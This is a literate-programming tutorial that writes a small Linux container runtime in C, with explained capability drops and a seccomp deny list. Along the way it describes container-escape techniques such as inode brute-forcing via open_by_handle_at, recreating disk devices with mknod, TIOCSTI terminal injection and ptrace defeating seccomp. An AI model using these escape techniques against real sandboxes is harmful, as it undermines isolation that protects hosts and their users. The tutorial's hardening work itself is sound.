Linux containers in 500 lines of code

Container setup
contained.c

I've used Linux containers directly and indirectly for years, but I wanted to become more familiar with them. So I wrote some code. This used to be 500 lines of code, I swear, but I've revised it some since publishing; I've ended up with about 70 lines more.

I wanted specifically to find a minimal set of restrictions to run untrusted code. This isn't how you should approach containers on anything with any exposure: you should restrict everything you can. But I think it's important to know which permissions are categorically unsafe! I've tried to back up things I'm saying with links to code or people I trust, but I'd love to know if I missed anything.

This is a noweb-style piece of literate code. References named <<x>> will be expanded to the code block named x. You can find the tangled source here. This document is an orgmode document, you can find its source here. This document and this code are licensed under the GPLv3; you can find its source here.

Container setup

There are several complementary and overlapping mechanisms that make up modern Linux containers. Roughly,

namespaces are used to group kernel objects into different sets that can be accessed by specific process trees. For example, pid namespaces limit the view of the process list to the processes within the namespace. There are a couple of different kind of namespaces. I'll go into this more later.
capabilities are used here to set some coarse limits on what uid 0 can do.
cgroups is a mechanism to limit usage of resources like memory, disk io, and cpu-time.
setrlimit is another mechanism for limiting resource usage. It's older than cgroups, but can do some things cgroups can't.

These are all Linux kernel mechanisms. Seccomp, capabilities, and setrlimit are all done with system calls. cgroups is accessed through a filesystem.

There's a lot here, and the scope of each mechanism is pretty unclear. They overlap a lot and it's tricky to find the best way to limit things. User namespaces are somewhat new, and promise to unify a lot of this behavior. But unfortunately compiling the kernel with user namespaces enabled complicates things. Compiling with user namespaces changes the semantics of capabilities system-wide, which could cause more problems or at least confusion¹. There have been a large number of privilege-escalation bugs exposed by user namespaces. "Understanding and Hardening Linux Containers" explains

Despite the large upsides the user namespace provides in terms of security, due to the sensitive nature of the user namespace, somewhat conflicting security models and large amount of new code, several serious vulnerabilities have been discovered and new vulnerabilities have unfortunately continued to be discovered. These deal with both the implementation of user namespaces itself or allow the illegitimate or unintended use of the user namespace to perform a privilege escalation. Often these issues present themselves on systems where containers are not being used, and where the kernel version is recent enough to support user namespaces.

It's turned off by default in Linux at the time of this writing², but many distributions apply patches to turn it on in a limited way³.

But all of these issues apply to hosts with user namespaces compiled in; it doesn't really matter whether we use user namespaces or not, especially since I'll be preventing nested user namespaces. So I'll only use a user namespace if they're available.

(The user-namespace handling in this code was originally pretty broken. Jann Horn in particular gave great feedback. Thanks!)

`contained.c`

This program can be used like this, to run /misc/img/bin/sh in /misc/img as root:

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m ~/misc/busybox-img/ -u 0 -c /bin/sh
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.oQ5jOY...done.
=> trying a user namespace...writing /proc/32627/uid_map...writing /proc/32627/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
/ # whoami
root
/ # hostname
05fe5c-three-of-pentacles
/ # exit
=> cleaning cgroups...done.

So, a skeleton for it:

Listing 7: contained.c

/* -*- compile-command: "gcc -Wall -Werror -lcap -lseccomp contained.c -o contained" -*- */
/* This code is licensed under the GPLv3. You can find its text here:
   https://www.gnu.org/licenses/gpl-3.0.en.html */


#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <pwd.h>
#include <sched.h>
#include <seccomp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/capability.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <linux/capability.h>
#include <linux/limits.h>

struct child_config {
	int argc;
	uid_t uid;
	int fd;
	char *hostname;
	char **argv;
	char *mount_dir;
};

<<capabilities>>

<<mounts>>

<<syscalls>>

<<resources>>

<<child>>

<<choose-hostname>>

int main (int argc, char **argv)
{
	struct child_config config = {0};
	int err = 0;
	int option = 0;
	int sockets[2] = {0};
	pid_t child_pid = 0;
	int last_optind = 0;
	while ((option = getopt(argc, argv, "c:m:u:"))) {
		switch (option) {
		case 'c':
			config.argc = argc - last_optind - 1;
			config.argv = &argv[argc - config.argc];
			goto finish_options;
		case 'm':
			config.mount_dir = optarg;
			break;
		case 'u':
			if (sscanf(optarg, "%d", &config.uid) != 1) {
				fprintf(stderr, "badly-formatted uid: %s\n", optarg);
				goto usage;
			}
			break;
		default:
			goto usage;
		}
		last_optind = optind;
	}
finish_options:
	if (!config.argc) goto usage;
	if (!config.mount_dir) goto usage;

<<check-linux-version>>

	char hostname[256] = {0};
	if (choose_hostname(hostname, sizeof(hostname)))
		goto error;
	config.hostname = hostname;

<<namespaces>>

	goto cleanup;
usage:
	fprintf(stderr, "Usage: %s -u -1 -m . -c /bin/sh ~\n", argv[0]);
error:
	err = 1;
cleanup:
	if (sockets[0]) close(sockets[0]);
	if (sockets[1]) close(sockets[1]);
	return err;
}

Since I'll be blacklisting system calls and capabilities, it's important to make sure there aren't any new ones.

Listing 8: <<check-linux-version>> =

	fprintf(stderr, "=> validating Linux version...");
	struct utsname host = {0};
	if (uname(&host)) {
		fprintf(stderr, "failed: %m\n");
		goto cleanup;
	}
	int major = -1;
	int minor = -1;
	if (sscanf(host.release, "%u.%u.", &major, &minor) != 2) {
		fprintf(stderr, "weird release format: %s\n", host.release);
		goto cleanup;
	}
	if (major != 4 || (minor != 7 && minor != 8)) {
		fprintf(stderr, "expected 4.7.x or 4.8.x: %s\n", host.release);
		goto cleanup;
	}
	if (strcmp("x86_64", host.machine)) {
		fprintf(stderr, "expected x86_64: %s\n", host.machine);
		goto cleanup;
	}
	fprintf(stderr, "%s on %s.\n", host.release, host.machine);

(This had a bug. captainjey on reddit let me know. Thanks!)

And I wasn't quite at 500 lines of code, so I thought I had some space to build nice hostnames.

Listing 9: <<choose-hostname>> =

int choose_hostname(char *buff, size_t len)
{
	static const char *suits[] = { "swords", "wands", "pentacles", "cups" };
	static const char *minor[] = {
		"ace", "two", "three", "four", "five", "six", "seven", "eight",
		"nine", "ten", "page", "knight", "queen", "king"
	};
	static const char *major[] = {
		"fool", "magician", "high-priestess", "empress", "emperor",
		"hierophant", "lovers", "chariot", "strength", "hermit",
		"wheel", "justice", "hanged-man", "death", "temperance",
		"devil", "tower", "star", "moon", "sun", "judgment", "world"
	};
	struct timespec now = {0};
	clock_gettime(CLOCK_MONOTONIC, &now);
	size_t ix = now.tv_nsec % 78;
	if (ix < sizeof(major) / sizeof(*major)) {
		snprintf(buff, len, "%05lx-%s", now.tv_sec, major[ix]);
	} else {
		ix -= sizeof(major) / sizeof(*major);
		snprintf(buff, len,
			 "%05lxc-%s-of-%s",
			 now.tv_sec,
			 minor[ix % (sizeof(minor) / sizeof(*minor))],
			 suits[ix / (sizeof(minor) / sizeof(*minor))]);
	}
	return 0;
}

Namespaces

clone is the system call behind fork() et al. It's also the key to all of this. Conceptually we want to create a process with different properties than its parent: it should be able to mount a different /, set its own hostname, and do other things. We'll specify all of this by passing flags to clone ⁴.

The child needs to send some messages to the parent, so we'll initialize a socketpair, and then make sure the child only receives access to one.

Listing 10: <<namespaces>> +=

	if (socketpair(AF_LOCAL, SOCK_SEQPACKET, 0, sockets)) {
		fprintf(stderr, "socketpair failed: %m\n");
		goto error;
	}
	if (fcntl(sockets[0], F_SETFD, FD_CLOEXEC)) {
		fprintf(stderr, "fcntl failed: %m\n");
		goto error;
	}
	config.fd = sockets[1];

But first we need to set up room for a stack. We'll execve later, which will actually set up the stack again, so this is only temporary.⁵

Listing 13: <<namespaces>> +=

	#define STACK_SIZE (1024 * 1024)

	char *stack = 0;
	if (!(stack = malloc(STACK_SIZE))) {
		fprintf(stderr, "=> malloc failed, out of memory?\n");
		goto error;
	}

We'll also prepare the cgroup for this process tree. More on this later.

Listing 14: <<namespaces>> +=

	if (resources(&config)) {
		err = 1;
		goto clear_resources;
	}

We'll namespace the mounts, pids, IPC data structures, network devices, and hostname / domain name. I'll go into these more in the code for capabilities, cgroups, and syscalls.

Listing 15: <<namespaces>> +=

	int flags = CLONE_NEWNS
		| CLONE_NEWCGROUP
		| CLONE_NEWPID
		| CLONE_NEWIPC
		| CLONE_NEWNET
		| CLONE_NEWUTS;

Stacks on x86, and almost everything else Linux runs on, grow downwards, so we'll add STACK_SIZE to get a pointer just below the end.⁶ We also | the flags with SIGCHLD so that we can wait on it.

Listing 16: <<namespaces>> +=

	if ((child_pid = clone(child, stack + STACK_SIZE, flags | SIGCHLD, &config)) == -1) {
		fprintf(stderr, "=> clone failed! %m\n");
		err = 1;
		goto clear_resources;
	}

Close and zero the child's socket, so that if something breaks then we don't leave an open fd, possibly causing the child to or the parent to hang.

Listing 17: <<namespaces>> +=

	close(sockets[1]);
	sockets[1] = 0;

The parent process will configure the child's user namespace and then pause until the child process tree exits⁷.

Listing 21: <<child>> +=

#define USERNS_OFFSET 10000
#define USERNS_COUNT 2000

int handle_child_uid_map (pid_t child_pid, int fd)
{
	int uid_map = 0;
	int has_userns = -1;
	if (read(fd, &has_userns, sizeof(has_userns)) != sizeof(has_userns)) {
		fprintf(stderr, "couldn't read from child!\n");
		return -1;
	}
	if (has_userns) {
		char path[PATH_MAX] = {0};
		for (char **file = (char *[]) { "uid_map", "gid_map", 0 }; *file; file++) {
			if (snprintf(path, sizeof(path), "/proc/%d/%s", child_pid, *file)
			    > sizeof(path)) {
				fprintf(stderr, "snprintf too big? %m\n");
				return -1;
			}
			fprintf(stderr, "writing %s...", path);
			if ((uid_map = open(path, O_WRONLY)) == -1) {
				fprintf(stderr, "open failed: %m\n");
				return -1;
			}
			if (dprintf(uid_map, "0 %d %d\n", USERNS_OFFSET, USERNS_COUNT) == -1) {
				fprintf(stderr, "dprintf failed: %m\n");
				close(uid_map);
				return -1;
			}
			close(uid_map);
		}
	}
	if (write(fd, & (int) { 0 }, sizeof(int)) != sizeof(int)) {
		fprintf(stderr, "couldn't write: %m\n");
		return -1;
	}
	return 0;
}

The child process will send a message to the parent process about whether it should set uid and gid mappings. If that works, it will setgroups, setresgid, and setresuid. Both setgroups and setresgid are necessary here since there are two separate group mechanisms on Linux⁹. I'm also assuming here that every uid has a corresponding gid, which is common but not necessarily universal.

Listing 23: <<child>> +=

int userns(struct child_config *config)
{
	fprintf(stderr, "=> trying a user namespace...");
	int has_userns = !unshare(CLONE_NEWUSER);
	if (write(config->fd, &has_userns, sizeof(has_userns)) != sizeof(has_userns)) {
		fprintf(stderr, "couldn't write: %m\n");
		return -1;
	}
	int result = 0;
	if (read(config->fd, &result, sizeof(result)) != sizeof(result)) {
		fprintf(stderr, "couldn't read: %m\n");
		return -1;
	}
	if (result) return -1;
	if (has_userns) {
		fprintf(stderr, "done.\n");
	} else {
		fprintf(stderr, "unsupported? continuing.\n");
	}
	fprintf(stderr, "=> switching to uid %d / gid %d...", config->uid, config->uid);
	if (setgroups(1, & (gid_t) { config->uid }) ||
	    setresgid(config->uid, config->uid, config->uid) ||
	    setresuid(config->uid, config->uid, config->uid)) {
		fprintf(stderr, "%m\n");
		return -1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}

And this is where the child process from clone will end up. We'll perform all of our setup, switch users and groups, and then load the executable. The order is important here: we can't change mounts without certain capabilities, we can't unshare after we limit the syscalls, etc.

Listing 24: <<child>> +=

int child(void *arg)
{
	struct child_config *config = arg;
	if (sethostname(config->hostname, strlen(config->hostname))
	    || mounts(config)
	    || userns(config)
	    || capabilities()
	    || syscalls()) {
		close(config->fd);
		return -1;
	}
	if (close(config->fd)) {
		fprintf(stderr, "close failed: %m\n");
		return -1;
	}
	if (execve(config->argv[0], config->argv, NULL)) {
		fprintf(stderr, "execve failed! %m.\n");
		return -1;
	}
	return 0;
}

Capabilties

capabilities subdivide the property of "being root" on Linux. It's useful to compartmentalize privileges so that, for example a process can allocate network devices (CAP_NET_ADMIN) but not read all files (CAP_DAC_OVERRIDE). I'll use them here to drop the ones we don't want.

But not all of "being root" is subvidivided into capabilities. For example, writing to parts of procfs is allowed by root even after having dropped capabilities¹⁰. There are a lot of things like this: this is part of why need other restrictions beside capabilities.

It's also important to think about how we're dropping capabilities. man 7 capabilities has an algorithm for us:

	During  an   execve(2),  the   kernel  calculates   the  new
	capabilities of the process using the following algorithm:

	    P'(ambient) = (file is privileged) ? 0 : P(ambient)

	    P'(permitted) = (P(inheritable) & F(inheritable)) |
					(F(permitted) & cap_bset) | P'(ambient)

	    P'(effective) = F(effective) ? P'(permitted) : P'(ambient)

	    P'(inheritable) = P(inheritable)    [i.e., unchanged]

	where:

	    P         denotes the  value of a thread  capability set
			    before the execve(2)

	    P'        denotes the  value of a thread  capability set
			    after the execve(2)

	    F         denotes a file capability set

	    cap_bset  is the  value of  the capability  bounding set
			    (described below).

We'd like P'(ambient) and P(inheritable) to be empty, and P'(permitted) and P(effective) to only include the capabilities above. This is achievable by doing the following

Clearing our own inheritable set. This clears the ambient set; man 7 capabilities says "The ambient capability set obeys the invariant that no capability can ever be ambient if it is not both permitted and inheritable." This also clears the child's inheritable set.
Clearing the bounding set. This limits the file capabilities we'll gain when we execve, and the rest are limited by clearing the inheritable and ambient sets.

If we were to only drop our own effective, permitted and inheritable sets, we'd regain the permissions in the child file's capabilities. This is how bash can call ping, for example.¹¹

Dropped capabilities

Listing 29: <<capabilities>> +=

int capabilities()
{
	fprintf(stderr, "=> dropping capabilities...");

CAP_AUDIT_CONTROL, _READ, and _WRITE allow access to the audit system of the kernel (i.e. functions like audit_set_enabled, usually used with auditctl). The kernel prevents messages that normally require CAP_AUDIT_CONTROL outside of the first pid namespace, but it does allow messages that would require CAP_AUDIT_READ and CAP_AUDIT_WRITE from any namespace.¹² So let's drop them all. We especially want to drop CAP_AUDIT_READ, since it isn't namespaced¹³ and may contain important information, but CAP_AUDIT_WRITE may also allow the contained process to falsify logs or DOS the audit system.

Listing 32: <<capabilities>> +=

	int drop_caps[] = {
		CAP_AUDIT_CONTROL,
		CAP_AUDIT_READ,
		CAP_AUDIT_WRITE,

CAP_BLOCK_SUSPEND lets programs prevent the system from suspending, either with EPOLLWAKEUP or /proc/sys/wake_lock.¹⁴ Supend isn't namespaced, so we'd like to prevent this.

Listing 34: <<capabilities>> +=

		CAP_BLOCK_SUSPEND,

CAP_DAC_READ_SEARCH lets programs call open_by_handle_at with an arbitrary struct file_handle *. struct file_handle is in theory an opaque type, but in practice it corresponds to inode numbers. So it's easy to brute-force them, and read arbitrary files. This was used by Sebastian Krahmer to write a program to read arbitrary system files from within Docker in 2014.¹⁵

Listing 36: <<capabilities>> +=

		CAP_DAC_READ_SEARCH,

CAP_FSETID, without user namespacing, allows the process to modify a setuid executable without removing the setuid bit. This is pretty dangerous! It means that if we include a setuid binary in a container, it's easy for us to accidentally leave a dangerous setuid root binary on our disk, which any user can use to escalate privileges.¹⁶

Listing 40: <<capabilities>> +=

		CAP_FSETID,

CAP_IPC_LOCK can be used to lock more of a process' own memory than would normally be allowed¹⁷, which could be a way to deny service.

Listing 43: <<capabilities>> +=

		CAP_IPC_LOCK,

CAP_MAC_ADMIN and CAP_MAC_OVERRIDE are used by the mandatory acess control systems Apparmor, SELinux, and SMACK to restrict access to their settings. These aren't namespaced, so they could be used by the contained programs to circumvent system-wide access control.

Listing 44: <<capabilities>> +=

		CAP_MAC_ADMIN,
		CAP_MAC_OVERRIDE,

CAP_MKNOD, without user namespacing, allows programs to create device files corresponding to real-world devices. This includes creating new device files for existing hardware. If this capability were not dropped, a contained process could re-create the hard disk device, remount it, and read or write to it.¹⁸

Listing 47: <<capabilities>> +=

		CAP_MKNOD,

I was worried that CAP_SETFCAP could be used to add a capability to an executable and execve it, but it's not actually possible for a process to set capabilities it doesn't have¹⁹. But! An executable altered this way could be executed by any unsandboxed user, so I think it unacceptably undermines the security of the system.

Listing 51: <<capabilities>> +=

		CAP_SETFCAP,

CAP_SYSLOG lets users perform destructive actions against the syslog. Importantly, it doesn't prevent contained processes from reading the syslog, which could be risky. It also exposes kernel addresses, which could be used to circumvent kernel address layout randomization²⁰.

Listing 54: <<capabilities>> +=

		CAP_SYSLOG,

CAP_SYS_ADMIN allows many behaviors! We don't want most of them (mount, vm86, etc). Some would be nice to have (sethostname, mount for bind mounts…) but the extra complexity doesn't seem worth it.

Listing 55: <<capabilities>> +=

		CAP_SYS_ADMIN,

CAP_SYS_BOOT allows programs to restart the system (the reboot syscall) and load new kernels (the kexec_load and kexec_file syscalls)²¹. We absolutely don't want this. reboot is user-namespaced, and the kexec* functions only work in the root user namespace, but neither of those help us.

Listing 59: <<capabilities>> +=

		CAP_SYS_BOOT,

CAP_SYS_MODULE is used by the syscalls delete_module, init_module, finit_module ²², by the code for kmod ²³, and by the code for loading device modules with ioctl²⁴.

Listing 66: <<capabilities>> +=

		CAP_SYS_MODULE,

CAP_SYS_NICE allows processes to set higher priority on given pids than the default²⁵. The default kernel scheduler doesn't know anything about pid namespaces, so it's possible for a contained process to deny service to the rest of the system²⁶.

Listing 71: <<capabilities>> +=

		CAP_SYS_NICE,

CAP_SYS_RAWIO allows full access to the host systems memory with /proc/kcore, /dev/mem, and /dev/kmem ²⁷, but a contained process would need mknod to access these within the namespace.²⁸. But it also allows things like iopl and ioperm, which give raw access to the IO ports²⁹.

Listing 76: <<capabilities>> +=

		CAP_SYS_RAWIO,

CAP_SYS_RESOURCE specifically allows circumventing kernel-wide limits, so we probably should drop it³⁰. But I don't think this can do more than DOS the kernel, in general³¹.

Listing 78: <<capabilities>> +=

		CAP_SYS_RESOURCE,

CAP_SYS_TIME: setting the time isn't namespaced, so we should prevent contained processes from altering the system-wide time³².

Listing 79: <<capabilities>> +=

		CAP_SYS_TIME,

CAP_WAKE_ALARM, like CAP_BLOCK_SUSPEND, lets the contained process interfere with suspend³³, and we'd like to prevent that.

Listing 81: <<capabilities>> +=

		CAP_WAKE_ALARM
	};

Listing 82: <<capabilities>> +=

	size_t num_caps = sizeof(drop_caps) / sizeof(*drop_caps);
	fprintf(stderr, "bounding...");
	for (size_t i = 0; i < num_caps; i++) {
		if (prctl(PR_CAPBSET_DROP, drop_caps[i], 0, 0, 0)) {
			fprintf(stderr, "prctl failed: %m\n");
			return 1;
		}
	}
	fprintf(stderr, "inheritable...");
	cap_t caps = NULL;
	if (!(caps = cap_get_proc())
	    || cap_set_flag(caps, CAP_INHERITABLE, num_caps, drop_caps, CAP_CLEAR)
	    || cap_set_proc(caps)) {
		fprintf(stderr, "failed: %m\n");
		if (caps) cap_free(caps);
		return 1;
	}
	cap_free(caps);
	fprintf(stderr, "done.\n");
	return 0;
}

Retained Capabilities

It's important to keep track of the capabilities I'm not dropping, too.

I've heard multiple places³⁴ that CAP_DAC_OVERRIDE might expose the same functionality as CAP_DAC_READ_SEARCH (i.e. open_by_handle_at), but as far as I can tell that isn't true. shocker.c doesn't get anywhere with only CAP_DAC_OVERRIDE ³⁵, and the only usage in the kernel is in the Unix permission-checking code³⁶. So my understanding is that CAP_DAC_OVERRIDE on its own doesn't allow processes to read outside of their mount namespaces ("DAC" or "Discretionary Access Control" refers here to ordinary unix permissions).

CAP_FOWNER, CAP_LEASE, and CAP_LINUX_IMMUTABLE all operate on files inside of the mount namespace.

Likewise, CAP_SYS_PACCT allows processes to switch accounting on and off for itself. The acct system call takes a path to log to (which must be within the mount namespace), and only operates on the calling process. We're not using process accounting in our containerization, so turning it off should be harmless as well.³⁷

CAP_IPC_OWNER is only used by functions that respect IPC namespaces³⁸; since we're in a separate IPC namespace from the host, we can allow this.

CAP_NET_ADMIN lets processes create network devices; CAP_NET_BIND_SERVICE lets processes bind to low ports on those devices; CAP_NET_RAW lets processes send raw packets on those devices. Since we're going to isolate the networking with a virtual bridge, and the contained process is inside of a network namespace, these shouldn't be an issue³⁹. I was wondering whether we could recreate an existing device like mknod does, but I don't think it's possible ⁴⁰.

CAP_SYS_PTRACE doesn't allow ptrace across pid namespaces⁴¹. CAP_KILL doesn't allow signals across pid namespaces⁴².

CAP_SETUID and CAPSETGID have similar behaviors⁴³:

Make arbitrary manipulations of process UIDS and GIDs and supplementary GID list, which will only apply to pids in the namespace.
forge UID (GID) when passing socket credentials via UNIX domain sockets the mount namespace should prevent us from reading the host system's unix domain sockets.
write a user(group ID) mapping in a user namespace (see user_namespaces(7)): this is /proc/self/uid_map, which will be hidden inside the container.

CAP_SETPCAP only lets processes add or drop capabilities they already effectively have; man 7 capabilities says

If file capabilities are supported: add any capability from the calling thread's bounding set to its inheritable set; drop capabilities from the bounding set (via prctl(2) PR_CAPBSET_DROP); make changes to the securebits flags.

We've dropped everything relevant from the bounding set, and dropping further capabilities should be harmless.

CAP_SYS_CHROOT is traditionally abused by changing root to a directory with a setuid root binary and tampered-with dynamic libraries⁴⁴. Additionally, it can be used to escape a chroot "jail"⁴⁵. Neither of those should be relevant in our setup so this should be harmless.

Brad Spengler, in "False Boundaries and Arbitrary Code Execution" says that CAP_SYS_TTYCONFIG can "temporarily change the keyboard mapping of an administrator's tty via the KDSETKEYCODE ioctl to cause a different command to be executed than intended", but again this is an ioctl against a device that should be impossible to access within the mount namespace.

Mounts

The child process is in its own mount namespace, so we can unmount things that it specifically shouldn't have access to. Here's how:

Create a temporary directory, and one inside of it.
Bind mount of the user argument onto the temporary directory
pivot_root, making the bind mount our root and mounting the old root onto the inner temporary directory.
umount the old root, and remove the inner temporary directory.

But first we'll remount everything with MS_PRIVATE. This is mostly a convenience, so that the bind mount is invisible outside of our namespace.

Listing 108: <<mounts>> =

<<pivot-root>>

int mounts(struct child_config *config)
{
	fprintf(stderr, "=> remounting everything with MS_PRIVATE...");
	if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) {
		fprintf(stderr, "failed! %m\n");
		return -1;
	}
	fprintf(stderr, "remounted.\n");

	fprintf(stderr, "=> making a temp directory and a bind mount there...");
	char mount_dir[] = "/tmp/tmp.XXXXXX";
	if (!mkdtemp(mount_dir)) {
		fprintf(stderr, "failed making a directory!\n");
		return -1;
	}

	if (mount(config->mount_dir, mount_dir, NULL, MS_BIND | MS_PRIVATE, NULL)) {
		fprintf(stderr, "bind mount failed!\n");
		return -1;
	}

	char inner_mount_dir[] = "/tmp/tmp.XXXXXX/oldroot.XXXXXX";
	memcpy(inner_mount_dir, mount_dir, sizeof(mount_dir) - 1);
	if (!mkdtemp(inner_mount_dir)) {
		fprintf(stderr, "failed making the inner directory!\n");
		return -1;
	}
	fprintf(stderr, "done.\n");

	fprintf(stderr, "=> pivoting root...");
	if (pivot_root(mount_dir, inner_mount_dir)) {
		fprintf(stderr, "failed!\n");
		return -1;
	}
	fprintf(stderr, "done.\n");

	char *old_root_dir = basename(inner_mount_dir);
	char old_root[sizeof(inner_mount_dir) + 1] = { "/" };
	strcpy(&old_root[1], old_root_dir);

	fprintf(stderr, "=> unmounting %s...", old_root);
	if (chdir("/")) {
		fprintf(stderr, "chdir failed! %m\n");
		return -1;
	}
	if (umount2(old_root, MNT_DETACH)) {
		fprintf(stderr, "umount failed! %m\n");
		return -1;
	}
	if (rmdir(old_root)) {
		fprintf(stderr, "rmdir failed! %m\n");
		return -1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}

pivot_root is a system call lets us swap the mount at / with another. Glibc doesn't provide a wrapper for it, but includes a prototype in the man page. I don't really understand, but OK, we'll include our own.

Listing 109: <<pivot-root>> =

int pivot_root(const char *new_root, const char *put_old)
{
	return syscall(SYS_pivot_root, new_root, put_old);
}

It's worth noting that I'm avoiding packing and unpackaging containers. This is fertile ground for vulnerabilities⁴⁶; I'll count on the user to ensure that the mounted directory doesn't contain trusted or sensitive files or hard links.

System Calls

I'll be blacklisting system calls that I can demonstrate causing harm or sandbox escapes. Again this isn't the best way to do this, but it seems like the most illustrative.

Docker's documentation and default seccomp profile are reasonable sources for dangerous system calls⁴⁷. They also include obsolete sytem calls and calls that overlap with restricted capabilities; I'll ignore those.

Disallowed System Calls

Listing 113: <<syscalls>> +=

#define SCMP_FAIL SCMP_ACT_ERRNO(EPERM)

int syscalls()
{
	scmp_filter_ctx ctx = NULL;
	fprintf(stderr, "=> filtering syscalls...");
	if (!(ctx = seccomp_init(SCMP_ACT_ALLOW))

We want to prevent new setuid / setgid executables from being created, since in the absence of user namespaces the contained process could create a setuid binary that could be used by any user to get root.⁴⁸

Listing 116: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))

Allowing contained processes to start new user namespaces can allow processes to gain new (albeit limited) capabilities, so we prevent it.

Listing 117: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(unshare), 1,
				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,
				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))

TIOCSTI allows contained processes to write to the controlling terminal⁴⁹.

Listing 121: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ioctl), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, TIOCSTI, TIOCSTI))

The kernel keyring system isn't namespaced.⁵⁰

Listing 123: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)

Before Linux 4.8, ptrace totally breaks seccomp⁵¹.

Listing 127: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ptrace), 0)

These system calls let processes assign NUMA nodes. I don't have anything specific in mind, but I could see these being used to deny service to some other NUMA-aware application on the host.

Listing 128: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(mbind), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(migrate_pages), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(move_pages), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(set_mempolicy), 0)

userfaultd allows userspace to handle page faults⁵². It doesn't require any privileges, so in theory it should be safe to be called by an unprivileged user. But it can be used to pause execution in the kernel by triggering page faults in system calls. This is an important part in some kernel exploits⁵³. It's only rarely used legitimately, so I'll disable it.

Listing 130: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(userfaultfd), 0)

I was initially worried about perf_event_open because the Docker documentation says it "could leak a lot of information on the host", but it can't be used in our system to see information for out-of-namespace processes⁵⁴. But, if /proc/sys/kernel/perf_event_paranoid is less than 2, it can be used to discover kernel addresses and possibly uninitialized memory. 2 is the default since is the default since 4.6, but it can be changed, and relying on it seems like a bad idea⁵⁵.

Listing 135: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(perf_event_open), 0)

We'll set PR_SET_NO_NEW_PRIVS to 0. The name is a little vague: it specifically prevents setuid and setcap'd binaries from being executed with their additional privileges. This has some security benefits (it makes it harder for an unprivileged user in-container to exploit a vulnerability in a setuid or setcap executable to become in-container root, for example). But it's a little weird, and means that, for example, ping won't work in a container for an unprivileged user⁵⁶.

Listing 140: <<syscalls>> +=

	    || seccomp_attr_set(ctx, SCMP_FLTATR_CTL_NNP, 0)

And we'll actually apply it to the process, and release the context.

Listing 141: <<syscalls>> +=

	    || seccomp_load(ctx)) {
		if (ctx) seccomp_release(ctx);
		fprintf(stderr, "failed: %m\n");
		return 1;
	}
	seccomp_release(ctx);
	fprintf(stderr, "done.\n");
	return 0;
}

Allowed System Calls

Here are the system calls that are disallowed by the default Docker policy but permitted by this code:

_sysctl is obsolete and disabled by default⁵⁷. alloc_hugepages and free_hugepages ⁵⁸, bdflush ⁵⁹, create_module ⁶⁰, nfsservctl ⁶¹, perfctr ⁶², get_kernel_syms ⁶³, and setup ⁶⁴ are not present on modern Linux.

clock_adjtime, clock_settime ⁶⁵, and adjtime ⁶⁶ depend on CAP_SYS_TIME.

pciconfig_read and pciconfig_write ⁶⁷ and all of the side-effecting operations of quotactl ⁶⁸ are prevented by CAP_SYS_ADMIN.

get_mempolicy and getpagesize reveal information about the memory layout of the system, but they can be made by unprivileged processes, and are probably harmless. pciconfig_iobase can be made by unprivileged processes, and reveals information about PCI decvices. ustat ⁶⁹ and sysfs ⁷⁰ leak some information about the filesystems, but are nothing that I see as critical. uselib is more-or-less obsolete, but is just used for loading a shared library in userspace ⁷¹

sync_file_range2 is sync_file_range with swapped argument order⁷².

readdir is mostly obsolete, but probably harmless⁷³.

